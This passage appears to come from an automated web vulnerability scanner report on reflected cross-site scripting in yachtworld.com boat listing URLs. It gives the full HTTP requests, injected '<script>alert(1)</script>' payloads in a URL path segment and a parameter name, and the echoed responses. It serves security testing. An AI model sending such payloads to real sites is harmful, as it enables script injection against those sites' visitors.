Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:38 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 18 Nov 2010 20:30:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:37 GMT
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2272100&boat_id=2272100&back=/core/boats/2008/Regulator-32-Fs-2272100/Hampton/VA23553"><script>alert(1)</script>dd7c4f7507a/United-States&boat_id=2272100">
...[SNIP]...

3.167. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3177b"><script>alert(1)</script>c02fddab7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States3177b"><script>alert(1)</script>c02fddab7e HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:11 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 18 Nov 2010 20:30:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:11 GMT
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2272100&boat_id=2272100&back=/core/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States3177b"><script>alert(1)</script>c02fddab7e&boat_id=2272100">
...[SNIP]...

3.168. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5500"><script>alert(1)</script>7542b1e6f36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States?e5500"><script>alert(1)</script>7542b1e6f36=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:18 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 18 Nov 2010 20:30:49 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:18 GMT
Set-Cookie: VIEWED_BOATS_STORE=2272100%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B169%2C000%5B%25%5DHampton%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F7%2F2%2F1%2F2272100_1_mini.jpg%3F1286375575000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-FS-2272100%2FHampton%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.